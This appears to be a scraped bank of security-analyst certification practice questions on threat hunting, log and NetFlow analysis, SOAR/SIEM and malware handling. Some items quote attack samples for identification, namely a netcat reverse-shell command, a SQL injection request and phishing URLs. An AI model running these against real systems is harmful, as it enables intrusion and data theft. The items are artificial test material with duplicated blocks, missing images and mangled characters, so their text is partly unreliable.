Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?
1. Removing all links in email
2. Redirecting links in email to a proxy
3. Scanning all email using an antimalware tool
4. Using a DNS blackhole and IP reputation list
James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in?
1. A sandbox
2. A physical machine
3. A container
4. A DMARC

While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?

Date flow start        Duration Proto    Src IP Addr:Port    Dst IP
Addr:Port  Packets     Bytes    Flows 
2019-07-11 13:06:46.343 21601804    TCP      10.1.1.1:1151->10.2.2.3:443 9473640     9.1 G      1 
2019-07-11 13:06:46.551 21601804    TCP      10.2.2.3:443->10.1.1.1:11518345101      514 M      1

A web browsing session
Data exfiltration
Data infiltration
A vulnerability scan

Luis discovers the following entries in /var/log/auth.log. What is most likely occurring?

Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2

A user has forgotten their password
A brute-force attack against the root account
A misconfigured service
A denial-of-service attack against the root account

Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?
1. Add an iptables rule blocking root logins
2. Add root to the sudoers group
3. Change sshd_config to deny root login
4. Add a network IPS rule to block root logins
Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command.
```
at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe 
```
What does it do?
1. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
2. It uses the AT command to dial a remote host via NetBIOS.
3. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
4. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.

While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:

Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]

Which of the following has not occurred?

A user has attempted to reauthenticate too many times.
PAM is configured for three retries and will reject any additional retries in the same session.
Fail2ban has blocked the SSH login attempts.
Root is attempting to log in via SSH from the local host.

Fred has been tasked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user's job?
1. Time-based
2. Rule-based
3. Role-based
4. Location-based
Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use?
1. A containerization tool
2. A virtualization tool
3. A sandbox tool
4. A packet analyzer
While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
```
nc -l -p 43501 < example.zip 
```
What happened?
1. The user set up a reverse shell running as example.zip.
2. The user set up netcat as a listener to push example.zip.
3. The user set up a remote shell running as example.zip.
4. The user set up netcat to receive example.zip.
Susan is hunting threats and performs the following query against her database of event lots. What type of threat is she looking for?
```
Select source.name, destination.name, count(*) from network-events, where destination.port = '3389' 
```
1. SSH
2. MySQL
3. RDP
4. IRC
At what point in a continuous integration (CI)/continuous delivery (CD) pipeline should security testing be performed?
1. After code is checked into the repository
2. After code is deployed into an automated test environment
3. After the code is deployed into production
4. All of the above
Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows 10 Pro workstations?
1. Using application whitelisting to prevent all prohibited programs from running
2. Using Windows Defender and adding the game to the blacklist file
3. Listing it in the Blocked Programs list via secpol.msc
4. You cannot blacklist applications in Windows 10 without a third-party application

While reviewing his Apache logs, Oscar discovers the following entry. What has occurred?

10.1.1.1 - - [27/Jun/2019:11:42:22 -0500] "GET
/query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,
username,user_id,password,name,%20email,%20FROM%20users
HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

A successful database query
A php overflow attack
A SQL injection attack
An unsuccessful database query

Jason wants to reverse-engineer a malware package. Which of the following tools should he use if he wants to do behavior-based analysis of a worm?
1. A disassembler
2. A network analyzer
3. A PE viewer
4. A debugger
What will a search using the following command do?
```
 grep -n -i -v mike *  
```
1. List all the lines where the word Mike shows up, regardless of case in all files in the current directory
2. Search all files with the word mike in the filename for lowercase words
3. Search a file named mike for all uppercase words
4. List all the lines where the word Mike does not show up, regardless of case, in all files in the current directory
Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean?
```
-rwxrw-r&—1 chuck admingroup 1232 Feb 28 16:22 myfile.txt 
```
1. User chuck has read and write rights to the file; the administrators group has read, write, and execute rights; and all other users only have read rights.
2. User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
3. User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
4. User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
While reviewing web server logs, Danielle notices the following entry. What occurred?
```
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200 
```
1. A theme was changed
2. A file was not found
3. An attempt to edit the 404 page
4. The 404 page was displayed
Melissa wants to deploy a tool to coordinate information from a wide range of platforms so that she can see it in a central location and then automate responses as part of security workflows. What type of tool should she deploy?
1. UEBA
2. SOAR
3. SIEM
4. MDR
While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:
```
service rogueservice stop 
```
After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?
1. The service restarted at reboot, so she needs to include the -p, or permanent, flag.
2. The service restarted itself, so she needs to delete the binary associated with the service.
3. The service restarted at reboot, so she should add an .override file to stop the service from starting.
4. A malicious user restarted the service, so she needs to ensure users cannot restart services.
Why might Mark choose to implement an IPS instead of an IDS?
1. The IPS can detect attacks that an IDS cannot.
2. The IPS can block attacks in addition to reporting them.
3. The IPS can use heuristic analysis.
4. The IPS can use signature-based analysis.
While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks on the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
1. An encrypted RAT
2. A VPN application
3. A secure web browser
4. A base64 encoded packet transfer utility
Bohai uses the following command while investigating a Windows workstation used by his organization's vice president of Finance, who only works during normal business hours. Bohai believes that the workstation has been used without permission by members of his organization's cleaning staff after hours. What does he know if the userID shown is the only userID able to log in to the system, and he is investigating on August 12, 2019?
```
C:Usersigfish>wmic netlogin get name,lastlogon,badpasswordcount
BadPasswordCount  LastLogon                 Name
                                            NT AUTHORITYSYSTEM
0        20190811203748.000000-240  Financeigfish
```
1. The account has been compromised.
2. No logins have occurred.
3. The last login was during business hours.
4. Bohai cannot make any determinations from this information.
After a series of compromised accounts led to her domain being blacklisted, Wang has been asked to restore her company's email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?
1. Migrate her company's SMTP servers to new IP addresses.
2. Migrate to a cloud email hosting provider.
3. Change SMTP headers to prevent blacklisting.
4. Work with the blacklisting organizations to get removed from the list.
While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?
1. Anomalous behavior
2. Heuristic behavior
3. Entity behavior
4. Known-good behavior

Date flow start        Duration Proto    Src IP Addr:Port    Dst IP
Addr:Port  Packets     Bytes    Flows 
2019-07-11 13:06:46.343 21601804    TCP      10.1.1.1:1151->10.2.2.3:443 9473640     9.1 G      1 
2019-07-11 13:06:46.551 21601804    TCP      10.2.2.3:443->10.1.1.1:11518345101      514 M      1

A web browsing session
Data exfiltration
Data infiltration
A vulnerability scan

How does data enrichment differ from threat feed combination?
1. Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third-party data to focus on core data elements rather than adding together multiple data sources.
2. Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
3. Threat feed combination is more useful than data enrichment because of its focus on only the threats.
4. Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.
Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?
1. Route poisoning
2. Antimalware router filters
3. Subdomain whitelisting
4. DNS blackholing
Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?
1. An IPS
2. An IDS
3. A HIPS
4. A HIDS
Attackers have been attempting to log in to Alaina's Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?
1. Prevent console login via SSH
2. Implement a login-block feature with back-off settings
3. Move the administrative interface to a protected network
4. Disable console access entirely
The NetFlow collector that Sam's security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?
1. Enable QoS
2. Enable NetFlow compression
3. Enable sampling
4. None of the above
Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, which are becoming more prevalent, and which are decreasing in occurrence. What type of analysis can she perform using this information?
1. Anomaly
2. Trend
3. Heuristic
4. Availability
Which of the following capabilities is not a typical part of a SIEM system?
1. Alerting
2. Performance management
3. Data aggregation
4. Log retention
Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
1. Use sha1sum to generate a hash for the file and write a script to check it periodically
2. Install and use Tripwire
3. Periodically check the MAC information for the file using a script
4. Encrypt the file and keep the key secret so the file cannot be modified
Maria wants to deploy an antimalware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?
1. Signature-based
2. Heuristic-based
3. Trend-based
4. Availability-based
Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?
1. Anomalies in privileged account usage
2. Time-based login information
3. A mobile device profile change
4. DNS request anomalies
Miguel works for a company that has a network security standard requiring the collection and storage of NetFlow logs from all datacenter networks. Miguel is working to commission a new datacenter network but, due to technical constraints, will be unable to collect NetFlow logs for the first six months of operation. Which one of the following data sources is best suited to serve as a compensating control for the lack of NetFlow information?
1. Router logs
2. Firewall logs
3. Switch logs
4. IPS logs
Megan wants to check memory utilization on a Macintosh system. What Apple tool can she use to do this?
1. Activity Monitor
2. MemControl
3. Run memstat from the command line
4. Run memctl from the command line
Which one of the following components is not normally part of an endpoint security suite?
1. IPS
2. Firewall
3. Antimalware
4. VPN
Joan is working as a security consultant to a company that runs a critical web application. She discovered that the application has a serious SQL injection vulnerability but the company cannot take the system offline during the two weeks required to revise the code. Which one of the following technologies would serve as the best compensating control?
1. IPS
2. WAF
3. Vulnerability scanning
4. Encryption
Questions 133–136 refer to the following scenario and image.

Bill is reviewing the authentication logs for a Linux system that he operates and encounters the following log entries:
```
Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 57478 ssh2: RSA e5:f5:c1:46:bb:49:a1:43:da:9d:50:c5:37:bd:79:22
Aug 30 09:46:54 ip-172-30-0-62 ssh[3051]: pam_unix[sshd:session]: session opened for user ec2-user by (uid=0)
Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=ps/0 ; PWD=/home/ec2-user ; USER=root; COMMAND=/bin/bash
 
```
What is the IP address of the system where the user was logged in when they initiated the connection?
1. 172.30.0.62
2. 62.0.30.172
3. 10.174.238.88
4. 9.48.6.0
What service did the user use to connect to the server?
1. HTTPS
2. PTS
3. SSH
4. Telnet
What authentication technique did the user use to connect to the server?
1. Password
2. PKI
3. Token
4. Biometric
What account did the individual use to connect to the server?
1. root
2. ec2-user
3. bash
4. pam_unix
Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?
1. A firewall
2. A NetFlow collector
3. A honeypot
4. A BGP monitor

Fred believes that the malware he is tracking uses a fast flux network and multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here?

Date flow start    Duration Proto    Src IP Addr:Port    Dst IP Addr:Port  Packets Bytes   Flows 
2019-07-11 14:39:30.606 0.448    TCP      192.168.2.1:1451->10.2.3.1:443     10      1510    1
2019-07-11 14:39:30.826 0.448    TCP      10.2.3.1:443->192.168.2.1:1451     7       360     1
2019-07-11 14:45:32.495 18.492   TCP      10.6.2.4:443->192.168.2.1:1496    5     1107    1
2019-07-11 14:45:32.255 18.888   TCP      192.168.2.1:1496->10.6.2.4:443    11  1840    1
2019-07-11 14:46:54.983 0.000    TCP      192.168.2.1:1496->10.6.2.4:443     1       49      1
2008-12-09 16:45:34.764 0.362    TCP      10.6.2.4:443->192.168.2.1:4292      4       1392    1
2008-12-09 16:45:37.516 0.676    TCP      192.168.2.1:4292->10.6.2.4:443     4       462     1
2008-12-09 16:46:38.028 0.000    TCP      192.168.2.1:4292->10.6.2.4:443     2       89      1
2019-07-11 14:45:23.811 0.454    TCP      192.168.2.1:1515->10.6.2.5:443     4       263     1
2019-07-11 14:45:28.879 1.638    TCP      192.168.2.1:1505->10.6.2.5:443    18      2932    1
2019-07-11 14:45:29.087 2.288    TCP      10.6.2.5:443->192.168.2.1:1505    37    48125   1
2019-07-11 14:45:54.027 0.224    TCP      10.6.2.5:443->192.168.2.1:1515     2      1256    1
2019-07-11 14:45:58.551 4.328    TCP      192.168.2.1:1525->10.6.2.5:443    10      648     1
2019-07-11 14:45:58.759 0.920    TCP      10.6.2.5:443->192.168.2.1:1525   12     15792   1
2019-07-11 14:46:32.227 14.796   TCP      192.168.2.1:1525->10.8.2.5:443    31      1700    1
2019-07-11 14:46:52.983 0.000    TCP      192.168.2.1:1505->10.8.2.5:443     1       40      1

Fiona is considering a scenario in which components that her organization uses in their software that come from public GitHub repositories are trojaned. What should she do first to form the basis of her proactive threat hunting effort?
1. Search for examples of a similar scenario
2. Validate the software currently in use from the repositories
3. Form a hypothesis
4. Analyze the tools available for this type of attack
Jason is profiling a threat actor using STIX 2.0 and can choose among the following labels.
- Individual
- Club
- Contest
- Team
- Organization
- Government
What is he identifying?
1. Affiliation
2. Attack resource level
3. Certification level
4. Threat name
Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?
1. DKIM
2. An awareness campaign
3. Blocking all email from unknown senders
4. SPF
Micah wants to use the data he has collected to help with his threat hunting practice. What type of approach is best suited to using large volumes of log and analytical data?
1. Hypothesis-driven investigation
2. Investigation based on indicators of compromise
3. Investigation based on indications of attack
4. AI/ML-based investigation
Dani wants to analyze a malware package that calls home. What should she consider before allowing the malware to “phone home”?
1. Whether the malware may change behavior
2. Whether the host IP or subnet may become a target for further attacks
3. Attacks may be staged by the malware against other hosts
4. All of the above
After conducting an nmap scan of his network from outside of his network, James notes that a large number of devices are showing three TCP ports open on public IP addresses: 9100, 515, and 631. What type of devices has he found, and how could he reduce his organization's attack surface?
1. Wireless access points, disable remote administration
2. Desktop workstations, enable the host firewall
3. Printers, move the printers to an internal only IP range
4. Network switches, enable encrypted administration mode
As part of her threat-hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?
1. To increase complexity of analysis
2. To leverage similarity of threat profiles
3. To mix sensitivity levels
4. To provide a consistent baseline for threats
Unusual outbound network traffic, abnormal HTML response sizes, DNS request anomalies, and mis-matched ports for application traffic are all examples of what?
1. Threat hunting
2. SCAP
3. Indicators of compromise
4. Continuous threat feeds
Alex is working to understand his organization's attack surface. Services, input fields in a web application, and communication protocols are all examples of what component of an attack surface evaluation?
1. Threats
2. Attack vectors
3. Risks
4. Surface tension
Jiang wants to combine TAXII feeds with his own threat analysis information. What standard can he use to ensure that his data works across multiple systems without needing to be converted?
1. SAML
2. XHTML
3. STIX
4. YELLOW
Naomi wants to improve the detection capabilities for her security environment. A major concern for her company is detection of insider threats. What type of technology can she deploy to help with this type of proactive threat detection?
1. IDS
2. UEBA
3. SOAR
4. SIEM
Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators?
1. Subject lines
2. Email sender addresses
3. Attachments
4. All of the above
Isaac wants to write a script to query the BotScout forum bot blacklisting service. What data should he use to query the service based on the following image?
1. Email address
2. Name
3. IP address
4. Date
Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?
1. IOCs
2. Methods of data ingestion
3. SCAP connections
4. Attack vectors
Talos provides the BASS automated signature synthesizer tool due to modern challenges with malware. What major problem drives increasing use of automated malware signature creation tools?
1. More complex malware
2. Huge numbers of new malware signatures
3. Hash-based signatures take too long to create manually
4. Sandboxing is no longer effective
Yaan uses multiple data sources in his security environment, adding contextual information about users from Active Directory, geolocation data, multiple threat data feeds, as well as information from other sources to improve his understanding of the security environment. What term describes this process?
1. Data drift
2. Threat collection
3. Threat centralization
4. Data enrichment
When a DLP system is monitoring copy/paste, data displayed on a screen or captured from the screen, printing, and similar activities, what term describes the data's state?
1. Data at rest
2. Data in motion
3. Data in use
4. Data execution

Mila is reviewing feed data from the MISP open source threat intelligence tool and sees the following entry:

"Unit 42 has discovered a new malware family we've named
"Reaver" with ties to attackers who use SunOrcal malware. 
SunOrcal activity has been documented to at least 2013, and 
based on metadata surrounding some of the C2s, may have been 
active as early as 2010. The new family appears to have been in 
the wild since late 2016 and to date we have only identified 10 
unique samples, indicating it may be sparingly used. Reaver is 
also somewhat unique in the fact that its final payload is in 
the form of a Control panel item, or CPL file. To date, only 
0.006% of all malware seen by Palo Alto Networks employs this 
technique, indicating that it is in fact fairly rare.", "Tag": 
[{"colour": "#00223b", "exportable": true, "name": 
"osint:source-type="blog-post""}], "disable_correlation": 
false, "object_relation": null, "type": "comment"}, {"comment": 
"", "category": "Persistence mechanism", "uuid": "5a0a9d47-  1c7c-4353-8523-440b950d210f", "timestamp": "1510922426", 
"to_ids": false, "value": "%COMMONPROGRAMFILES%\services\", 
"disable_correlation": false, "object_relation": null, "type": 
"regkey"}, {"comment": "", "category": "Persistence mechanism", 
"uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp": 
"1510922426", "to_ids": false, "value": 
"%APPDATA%\microsoft\mmc\", "disable_correlation": false, 
"object_relation": null, "type": "regkey"}, {"comment": "", 
"category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-
4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids": 
false, "value": 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\
Shell Folders\Common Startup"

How does the Reaver malware maintain persistence?

A blog post
Inserts itself into the Registry
Installs itself as a runonce key
Requests user permission to start up

Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?
1. Signature-based analysis
2. A Babbage machine
3. Machine learning
4. Artificial network analysis
What is the advantage of a SOAR system over a traditional SIEM system?
1. SOAR systems are less complex to manage.
2. SOAR systems handle large log volumes better using machine learning.
3. SOAR systems integrate a wider range of internal and external systems.
4. SOAR logs are transmitted only over secure protocols.
What protocol does the U.S. government use to represent the data stored in the National Vulnerability Database?
1. STIX
2. CVSS
3. SCAP
4. CPE
Brian is on the development team that his company has tasked with maintaining their organization's web application. He and his coworkers check code in multiple times a day, and the code is then verified and tested automatically. What is this practice called?
1. Continuous delivery
2. Repo-stuffing
3. Continuous integration
4. Time coding
Fiona has continued her threat hunting efforts, and has formed a number of hypotheses. What key issue should she consider when she reviews them?
1. The number of hypotheses
2. Her own natural biases
3. Whether they are strategic or operational
4. If the attackers know about them
Mila is categorizing an actor using STIX 2.0 and wants to describe an actor that is responsible for APT-level attacks. What STIX threat actor sophistical level best fits this type of actor?
1. Intermediate
2. Advanced
3. Expert
4. Strategic
Christina wants to describe a threat actor's motivations, abilities, capabilities, and responses. What open standard markup language can she use to do this?
1. TAXII
2. OAuth
3. STIX
4. STONES

Alaina adds the openphish URL list to her SOAR tool and sees the following entries:

http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/success.htm
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/sitekey.php
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/success.htm
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/
http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/sitekey.php

What action should she take based on phishing URLs like these?

Block the IP address at her border firewall
Monitor for the IP address using her IDS
Delete emails with the URL from inbound email
Nothing, as these have not been confirmed

Rowan wants to block drive-by-downloads and bot command and control channels while redirecting potentially impacted systems to a warning message. What should she implement to do this?
1. A DNS sinkhole
2. A WAF
3. An IDS
4. A UEBA
What type of malware technique hides its command and control servers within a large number of possible suspects?
1. Polymorphic domain malware
2. Domain generation algorithms
3. Hostname multipliers
4. ICA spoofers
Alex configured a Snort rule that reads:
```
alert tcp any any -> any 22 (mst: "Detected!&rdquo;; sid 10000004;) 
```
What will Alex's rule typically detect?
1. FTP traffic
2. Telnet traffic
3. SMTP traffic
4. SSH traffic
Michelle wants to implement a static analysis security testing (SAST) tool into her continuous integration pipeline. What challenge could she run into if her organization uses multiple programming languages for components of their application stack that will be tested?
1. They will have to ensure the scanner works with all of the languages chosen.
2. They will have to compile all of the code to the same binary output language.
3. They will have to run the applications in a sandbox.
4. They will have to run the applications under the same execution environment.
Nina configures her IPS to detect and stop attacks based on signatures. What type of attacks will she block?
1. New attacks based on behavior
2. Previously documented attacks that match the signatures
3. Previously documented attacks and similar attacks based on the signatures
4. All of the above

Nathan wants to determine which systems are sending the most traffic on his network. What low overhead data gathering methodology can he use to view traffic sources, destinations, and quantities?

A network sniffer to view all traffic
Implement NetFlow
Implement SDWAN
Implement a network tap

Use the following table and rating information for questions 171–173.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) uses a 1–100 scale for incident prioritization, with weight assigned to each of a number of categories. The functional impact score is weighted in their demonstration as follows:

Functional impact	Rating
No impact	0
No impact to services	20
Minimal impact to noncritical services	35
Minimal impact to critical services	40
Significant impact to noncritical services	50
Denial of noncritical services	60
Significant impact to critical services	70
Denial of critical services or loss of control	100

Nathan discovers a malware package on an end user workstation. What rating should he give this if he is considering organization impact based on the table shown?
1. No impact
2. No impact to services
3. Denial of noncritical services
4. Denial of critical services or loss of control
Nathan's organization uses a software-as-a-service (SaaS) tool to manage their customer mailing lists, which they use to inform customers of upcoming sales a week in advance. The organization's primary line of business software continues to function and merchandise can be sold. Due to a service outage, they are unable to add new customers to the list for a full business day. How should Nathan rate this local impact issue during the outage?
1. Minimal impact to noncritical services
2. Minimal impact to critical services
3. Significant impact to noncritical services
4. Denial of noncritical services
During an investigation into a compromised system, Nathan discovers signs of an advanced persistent threat (APT) resident in his organization's administrative systems. How should he classify this threat?
1. Significant impact to noncritical services
2. Denial of noncritical services
3. Significant impact to critical services
4. Denial of critical services or loss of control
Adam is reviewing a Wireshark packet capture in order to perform protocol analysis, and he notes the following data in the Wireshark protocol hierarchy statistics. What percentage of traffic is most likely encrypted web traffic?
1. 85.9 percent
2. 1.7 percent
3. 20.3 percent
4. 1.9 percent
Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?
1. 172.17.8.8
2. 49.51.172.56
3. 172.17.8.172
4. 56.172.51.49
While reviewing IPS logs, Annie finds the following entry:
```
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  
```
What should her next action be?
1. Run an antimalware scan of the system associated with the detection
2. Block inbound traffic from the external system associated with the infection
3. Block outbound traffic to the external system associated with the infection
4. Nothing, as this is a false positive due to an expired certificate
Steve uploads a malware sample to an analysis tool and receives the following messages:
```
>Executable file was dropped: C:Logsmffcae1.exe
>Child process was created, parent C:Windowssystem32cmd.exe
>mffcae1.exe connects to unusual port
>File downloaded: cx99.exe 
```
If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?
1. An antimalware tool
2. Wireshark
3. An IPS
4. Network flows
Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same data center, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., one records the entry at 6 p.m. What issue has Abdul likely encountered?
1. A malware infection emulating a legitimate process
2. An incorrect time zone setting
3. A flaw in the automation script
4. A log entry error
Eric is performing threat intelligence work and wants to characterize a threat actor that his organization has identified. The threat actor is similar to the group known as Anonymous and has targeted organizations for political reasons in the past. How should he characterize this threat actor?
1. Unwitting insiders
2. Unknown
3. APT
4. Hacktivist
Melissa is using the US-CERT's scale to measure the impact of the location of observed activity by a threat actor. Which of the following should be the highest rated threat activity location?
1. Critical system DMZ
2. Business network
3. Business DMZ
4. Safety systems
Gavin wants to deploy a NAC solution. Which of the following is a validation technique that an agent-based NAC system can use?
1. Current operating system patch status
2. Network VLAN or security zone assignment
3. Antimalware or antivirus update status
4. All of the above
What information is used to determine which systems can connect to a network port protected by port security?
1. IP address
2. Hostname
3. MAC address
4. UserID and password
What do DLP systems use to classify data and to ensure that it remains protected?
1. Data signatures
2. Business rules
3. Data egress filters
4. Data at rest
Jana wants to configure her IPS to block a recently discovered denial of service condition that impacts her Apache web server. What is the most effective method of implementing this quickly if her IPS is provided by a commercial vendor?
1. Research the denial-of-service attack and write a custom detection rule
2. Block all traffic to the web servers until a patch is installed
3. Configure a signature-based rule using a signature provided by the vendor
4. Research the denial-of-service attack, and then use the first released exploit proof of concept to build a signature to detect the attack
Zhi wants to capture network flows from her network as shown in the following image. Where should she collect network flows to balance maximum visibility without collecting unnecessary information?
1. Point A
2. Point B
3. Point C
4. Point D
Benicio wants to implement a tool for all the workstations and laptops in his company that can combine behavioral detection of indicators of attack based on current threat intelligence with real-time visibility into the systems. What sort of tool should he select?
1. An IPS
2. An EDR
3. A CRM
4. A UEBA
Benita needs to change the permissions on a file named public_secrets.txt stored on a Linux server, and she wants to make the file readable to all users on the system.
The file is currently set to:

rwx------

What command can she use to do this without providing the ability to execute or write to the file?
1. chmod 777 public_secrets.txt
2. chmod 744 public_secrets.txt
3. chmod public_secrets.txt 777
4. chmod 447 public_secrets.txt
Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?
1. Run the malware on an isolated VM
2. Perform dynamic analysis of the malware in a sandbox
3. Perform static analysis of the malware
4. Run the malware in a container service
Tom wants to improve his detection capabilities for his software-as-a-service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?
1. EDR
2. CASB
3. IDS
4. SIEM
Chuck wants to identify a tool to provision servers, create virtual servers and assign storage to them, and configure networking and security policies. What type of tool should he consider?
1. Scripting
2. APIs
3. Workflow orchestration
4. SCAP
What advantages does TAXII provide for threat feed combination?
1. Interoperability between security tools
2. Confidentiality and integrity of data
3. Greater speed for sharing of data
4. All of the above
A production environment with “blue” and “green” deployments in parallel, with one live and one updated to the newest code, is an example of what type of pipeline?
1. Continuous integration
2. Waterfall
3. Spiral
4. Continuous delivery
Joseph's antimalware package detects new malware by examining code for suspicious properties. What type of technique is this an example of?
1. Fagan code inspection
2. Heuristic analysis
3. Machine learning
4. Artificial intelligence
Isaac wants to identify known good behavior patterns for all of the applications that his organization uses. If he doesn't want to have a staff member review logs and behaviors for every application in every scenario it is run, what type of analytical tool would best be suited to dealing with this volume and type of data?
1. Trend analysis
2. Machine learning
3. Manual analysis
4. Endpoint analysis
Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?
1. Set Detect Change
2. Set Validate File Versions
3. Set Audit Modifications
4. None of the above
Naomi wants to analyze URLs found in her passive DNS monitoring logs to find DGA (domain generation algorithm) generated command and control links. What techniques are most likely to be useful for this?
1. WHOIS lookups and NXDOMAIN queries of suspect URLs
2. Querying URL whitelists
3. DNS probes of command-and-control networks
4. Natural language analysis of domain names
Derek's organization has been working to recover from a recent malware infection that caused outages across the organization during an important part of their business cycle. In order to properly triage, what should Derek pay the most attention to first?
